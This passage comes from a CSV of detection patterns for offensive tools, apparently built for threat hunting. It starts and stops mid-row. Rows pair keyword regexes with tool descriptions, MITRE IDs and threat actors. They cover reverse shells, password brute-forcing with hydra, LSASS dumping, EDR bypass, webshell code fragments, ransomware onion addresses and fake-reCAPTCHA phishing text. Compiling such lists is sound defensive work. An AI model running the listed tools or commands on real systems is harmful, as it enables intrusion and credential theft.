solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","48047" "*https_payload_trusted.ps1*",".{0,1000}https_payload_trusted\.ps1.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","48048" "*https_revshell.exe*",".{0,1000}https_revshell\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","1","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","48049" "*HTTP-Server.py *",".{0,1000}HTTP\-Server\.py\s.{0,1000}","offensive_tool_keyword","HTTP-Shell","MultiPlatform HTTP Reverse Shell","T1573.001 - T1104 - T1205 - T1110","TA0005 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/HTTP-Shell","1","0","N/A","N/A","10","10","231","33","2024-09-27T10:23:14Z","2023-09-05T12:01:17Z","48050" "*httpsmuggler.jar*",".{0,1000}httpsmuggler\.jar.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","network exploitation 
tool","N/A","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","48051" "*'http-stager'*",".{0,1000}\'http\-stager\'.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mgeeky/RedWarden","1","0","N/A","N/A","10","10","964","143","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z","48052" "*huan.exe *.exe",".{0,1000}huan\.exe\s.{0,1000}\.exe","offensive_tool_keyword","Huan","Huan is an encrypted PE Loader Generator that I 
developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.","T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620","TA0002 - TA0008 - ","N/A","N/A","Exploitation tool","https://github.com/frkngksl/Huan","1","0","N/A","N/A","N/A","6","540","107","2021-08-13T10:48:26Z","2021-05-21T08:55:02Z","48053" "*Huan.sln*",".{0,1000}Huan\.sln.{0,1000}","offensive_tool_keyword","Huan","Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.","T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620","TA0002 - TA0008 - ","N/A","N/A","Exploitation tool","https://github.com/frkngksl/Huan","1","1","N/A","N/A","N/A","6","540","107","2021-08-13T10:48:26Z","2021-05-21T08:55:02Z","48054" "*Huan.vcxproj*",".{0,1000}Huan\.vcxproj.{0,1000}","offensive_tool_keyword","Huan","Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.","T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620","TA0002 - TA0008 - ","N/A","N/A","Exploitation tool","https://github.com/frkngksl/Huan","1","1","N/A","N/A","N/A","6","540","107","2021-08-13T10:48:26Z","2021-05-21T08:55:02Z","48055" "*HuanLoader.vcxproj*",".{0,1000}HuanLoader\.vcxproj.{0,1000}","offensive_tool_keyword","Huan","Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. 
It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.","T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620","TA0002 - TA0008 - ","N/A","N/A","Exploitation tool","https://github.com/frkngksl/Huan","1","1","N/A","N/A","N/A","6","540","107","2021-08-13T10:48:26Z","2021-05-21T08:55:02Z","48056" "*hub.docker.com/u/kalilinux/*",".{0,1000}hub\.docker\.com\/u\/kalilinux\/.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","48057" "*HunnicCyber/SharpDomainSpray*",".{0,1000}HunnicCyber\/SharpDomainSpray.{0,1000}","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","1","N/A","N/A","10","1","90","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z","48060" "*hunters33dootzzwybhxyh6xnmumopeoza6u4hkontdqu7awnhmix7ad.onion*",".{0,1000}hunters33dootzzwybhxyh6xnmumopeoza6u4hkontdqu7awnhmix7ad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","48061" "*hunters33mmcwww7ek7q5ndahul6nmzmrsumfs6aenicbqon6mxfiqyd.onion*",".{0,1000}hunters33mmcwww7ek7q5ndahul6nmzmrsumfs6aenicbqon6mxfiqyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes 
archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","48062" "*hunters55atbdusuladzv7vzv6a423bkh6ksl2uftwrxyuarbzlfh7yd.onion*",".{0,1000}hunters55atbdusuladzv7vzv6a423bkh6ksl2uftwrxyuarbzlfh7yd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","48063" "*hunters55rdxciehoqzwv7vgyv6nt37tbwax2reroyzxhou7my5ejyid.onion*",".{0,1000}hunters55rdxciehoqzwv7vgyv6nt37tbwax2reroyzxhou7my5ejyid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","48064" "*HVNC - Tinynuke Clone [Melted@HF]*",".{0,1000}HVNC\s\-\sTinynuke\sClone\s\[Melted\@HF\].{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","N/A","N/A","10","5","445","133","2025-03-27T21:20:10Z","2021-09-03T17:34:44Z","48065" "*HVNC - Tinynuke Clone*",".{0,1000}HVNC\s\-\sTinynuke\sClone.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","N/A","N/A","10","5","445","133","2025-03-27T21:20:10Z","2021-09-03T17:34:44Z","48066" "*HVNC Server.exe*",".{0,1000}HVNC\sServer\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often 
referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/WKL-Sec/HiddenDesktop","1","0","N/A","N/A","10","10","1213","187","2023-12-07T17:15:48Z","2023-05-21T00:57:43Z","48067" "*HVNC.Properties*",".{0,1000}HVNC\.Properties.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","48068" "*HVNC\ Server*",".{0,1000}HVNC\\\sServer.{0,1000}","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. 
This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/WKL-Sec/HiddenDesktop","1","0","N/A","N/A","10","10","1213","187","2023-12-07T17:15:48Z","2023-05-21T00:57:43Z","48069" "*hXOR-Packer.v0.1.zip*",".{0,1000}hXOR\-Packer\.v0\.1\.zip.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","1","N/A","N/A","9","1","57","14","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z","48070" "*hXOR-Packer-main*",".{0,1000}hXOR\-Packer\-main.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","0","N/A","N/A","9","1","57","14","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z","48071" "*hxt254aygrsziejn.onion*",".{0,1000}hxt254aygrsziejn\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes 
archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","48072" "*hydra * ftp://*",".{0,1000}hydra\s.{0,1000}\sftp\:\/\/.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","48073" "*hydra * http-post-form *",".{0,1000}hydra\s.{0,1000}\shttp\-post\-form\s.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","48074" "*hydra * mysql://*",".{0,1000}hydra\s.{0,1000}\smysql\:\/\/.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","48075" "*hydra * ssh://*",".{0,1000}hydra\s.{0,1000}\sssh\:\/\/.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","48076" "*hydra * telnet://*",".{0,1000}hydra\s.{0,1000}\stelnet\:\/\/.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to 
attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","48077" "*hydra smtp-enum*",".{0,1000}hydra\ssmtp\-enum.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","48078" "*hydra:x:10001:*",".{0,1000}hydra\:x\:10001\:.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","48079" "*HYDRA_PROXY_HTTP*",".{0,1000}HYDRA_PROXY_HTTP.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","48080" "*hydra-cobaltstrike*",".{0,1000}hydra\-cobaltstrike.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","48081" "*Hyperion PE-Crypter*",".{0,1000}Hyperion\sPE\-Crypter.{0,1000}","offensive_tool_keyword","hyperion","A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable 
with AES-128. The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds)","T1027.002 - T1059.001 - T1116","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://www.kali.org/tools/hyperion/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","48082" "*hyperion.exe *",".{0,1000}hyperion\.exe\s.{0,1000}","offensive_tool_keyword","hyperion","A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds)","T1027.002 - T1059.001 - T1116","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://www.kali.org/tools/hyperion/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","48083" "*hyperion.exe *.exe* *.exe*",".{0,1000}hyperion\.exe\s.{0,1000}\.exe.{0,1000}\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","48084" "*hyperion_2.0.orig.tar.gz*",".{0,1000}hyperion_2\.0\.orig\.tar\.gz.{0,1000}","offensive_tool_keyword","hyperion","A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. 
The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds)","T1027.002 - T1059.001 - T1116","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://www.kali.org/tools/hyperion/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","48085" "*Hyper-V-Hypervisor-Downgrade/Config.xml*",".{0,1000}Hyper\-V\-Hypervisor\-Downgrade\/Config\.xml.{0,1000}","offensive_tool_keyword","WindowsDowndate","A tool that takes over Windows Updates to craft custom downgrades and expose past fixed vulnerabilities","T1072 - T1486 - T1505.002 - T1495 - T1499.004","TA0005 - TA0004 - TA0003 ","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/WindowsDowndate","1","1","N/A","N/A","10","7","663","88","2024-10-26T10:18:49Z","2024-01-08T19:42:47Z","48088" "*Hypnos-main.zip*",".{0,1000}Hypnos\-main\.zip.{0,1000}","offensive_tool_keyword","Hypnos","indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections","T1055.012 - T1136.001 - T1070.004 - T1055.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CaptainNox/Hypnos","1","1","N/A","N/A","10","1","49","6","2024-02-12T17:51:24Z","2023-07-11T09:07:10Z","48089" "*hypobrychium.exe*",".{0,1000}hypobrychium\.exe.{0,1000}","offensive_tool_keyword","hypobrychium","hypobrychium AV/EDR Bypass","T1562.001 - T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/foxlox/hypobrychium","1","1","N/A","N/A","8","1","72","21","2023-07-21T21:13:20Z","2023-07-18T09:55:07Z","48091" "*hypobrychium-main*",".{0,1000}hypobrychium\-main.{0,1000}","offensive_tool_keyword","hypobrychium","hypobrychium AV/EDR Bypass","T1562.001 - T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/foxlox/hypobrychium","1","1","N/A","N/A","8","1","72","21","2023-07-21T21:13:20Z","2023-07-18T09:55:07Z","48092" "*I am not a robot - reCAPTCHA Verification ID: 
2165*",".{0,1000}I\sam\snot\sa\srobot\s\-\sreCAPTCHA\sVerification\sID\:\s2165.{0,1000}","offensive_tool_keyword","recaptcha-phish","Phishing with a fake reCAPTCHA","T1566.001 - T1204.002 - T1071.003","TA0001 - TA0002","Lumma Stealer","N/A","Phishing","https://github.com/JohnHammond/recaptcha-phish","1","0","N/A","N/A","10","6","534","104","2024-09-13T11:18:29Z","2024-09-13T07:00:40Z","48093" "*I am not a robot - reCAPTCHA Verification ID: 3029*",".{0,1000}I\sam\snot\sa\srobot\s\-\sreCAPTCHA\sVerification\sID\:\s3029.{0,1000}","offensive_tool_keyword","recaptcha-phish","Phishing with a fake reCAPTCHA","T1566.001 - T1204.002 - T1071.003","TA0001 - TA0002","Lumma Stealer","N/A","Phishing","https://github.com/JohnHammond/recaptcha-phish","1","0","N/A","N/A","10","6","534","104","2024-09-13T11:18:29Z","2024-09-13T07:00:40Z","48094" "*I am not a robot - reCAPTCHA Verification ID: 4202*",".{0,1000}I\sam\snot\sa\srobot\s\-\sreCAPTCHA\sVerification\sID\:\s4202.{0,1000}","offensive_tool_keyword","recaptcha-phish","Phishing with a fake reCAPTCHA","T1566.001 - T1204.002 - T1071.003","TA0001 - TA0002","Lumma Stealer","N/A","Phishing","https://github.com/JohnHammond/recaptcha-phish","1","0","N/A","N/A","10","6","534","104","2024-09-13T11:18:29Z","2024-09-13T07:00:40Z","48095" "*I am not a robot - reCAPTCHA Verification ID: 7537*",".{0,1000}I\sam\snot\sa\srobot\s\-\sreCAPTCHA\sVerification\sID\:\s7537.{0,1000}","offensive_tool_keyword","recaptcha-phish","Phishing with a fake reCAPTCHA","T1566.001 - T1204.002 - T1071.003","TA0001 - TA0002","Lumma Stealer","N/A","Phishing","https://github.com/JohnHammond/recaptcha-phish","1","0","N/A","N/A","10","6","534","104","2024-09-13T11:18:29Z","2024-09-13T07:00:40Z","48096" "*I am not a robot - reCAPTCHA Verification ID: 7624*",".{0,1000}I\sam\snot\sa\srobot\s\-\sreCAPTCHA\sVerification\sID\:\s7624.{0,1000}","offensive_tool_keyword","recaptcha-phish","Phishing with a fake reCAPTCHA","T1566.001 - T1204.002 - T1071.003","TA0001 - 
TA0002","Lumma Stealer","N/A","Phishing","https://github.com/JohnHammond/recaptcha-phish","1","0","N/A","N/A","10","6","534","104","2024-09-13T11:18:29Z","2024-09-13T07:00:40Z","48097" "*I am not a robot - reCAPTCHA Verification ID: 93752*",".{0,1000}I\sam\snot\sa\srobot\s\-\sreCAPTCHA\sVerification\sID\:\s93752.{0,1000}","offensive_tool_keyword","recaptcha-phish","Phishing with a fake reCAPTCHA","T1566.001 - T1204.002 - T1071.003","TA0001 - TA0002","Lumma Stealer","N/A","Phishing","https://github.com/JohnHammond/recaptcha-phish","1","0","N/A","N/A","10","6","534","104","2024-09-13T11:18:29Z","2024-09-13T07:00:40Z","48098" "*I need roooot. Unable to open *",".{0,1000}I\sneed\sroooot\.\sUnable\sto\sopen\s.{0,1000}","offensive_tool_keyword","RITM","python Man in the middle ","T1557.002 - T1040 - T1098.002 - T1557.001 - T1552.001","TA0006 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/Tw1sm/RITM","1","0","N/A","N/A","9","3","292","27","2024-11-20T14:27:24Z","2022-10-05T01:10:33Z","48099" "*I wasn't able to open the hosts file, maybe because UAC is enabled in remote computer!*",".{0,1000}I\swasn\'t\sable\sto\sopen\sthe\shosts\sfile,\smaybe\sbecause\sUAC\sis\senabled\sin\sremote\scomputer!.{0,1000}","offensive_tool_keyword","Fynloski Backdoor","Backdoor Fynloski also known as DarkComet - allows attackers to control the infected system and install other malware remotely","T1105 - T1071 - T1219 - T1059 - T1203 - T1056 - T1113","TA0011 - TA0009 - TA0010 - TA0008 - TA0002 - TA0005","N/A","N/A","Malware","https://www.hybrid-analysis.com/sample/43b40a12a966313f889c338e07239a42af67a69745507e45c4e899bcfa913b81/5a3d55d27ca3e1257f7044f3","1","0","N/A","N/A","7","7","N/A","N/A","N/A","N/A","48100" "*I2lmbmRlZiBQSU5HT09SCiNkZWZpbmUgUElOR09PUgoKI2RlZmluZSBTRVJWRVJJUCAiM*",".{0,1000}I2lmbmRlZiBQSU5HT09SCiNkZWZpbmUgUElOR09PUgoKI2RlZmluZSBTRVJWRVJJUCAiM.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for 
persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","48101" "*I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWI*",".{0,1000}I2luY2x1ZGUgPHN0ZGlvLmg\+DQojaW5jbHVkZSA8c3RyaW5nLmg\+DQojaW5jbHVkZSA8dW5pc3RkLmg\+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWI.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 ","N/A","EMBER BEAR - Sandworm","Persistence","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#content","N/A","10","4","376","211","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z","48102" "*i2pinstall*",".{0,1000}i2pinstall.{0,1000}","offensive_tool_keyword","I2P","I2P - The Invisible Internet Project.","T1048.001 - T1568.003","TA0011 - TA0040","N/A","N/A","Data Exfiltration","https://geti2p.net/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","48103" "*IAAgACAAIAB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgAgACAAIAAgAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABjAGwAYQBzAHMAIABMAFMAQQBTAFMARAB1AG0AcAA*",".{0,1000}IAAgACAAIAB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgAgACAAIAAgAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABjAGwAYQBzAHMAIABMAFMAQQBTAFMARAB1AG0AcAA.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential 
Access","https://github.com/yehia-mamdouh/Lsassx","1","0","#base64","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","48104" "*iam__enum_assume_role/default-word-list.txt*",".{0,1000}iam__enum_assume_role\/default\-word\-list\.txt.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","48105" "*iamaduck7@onionmail.org*",".{0,1000}iamaduck7\@onionmail\.org.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes 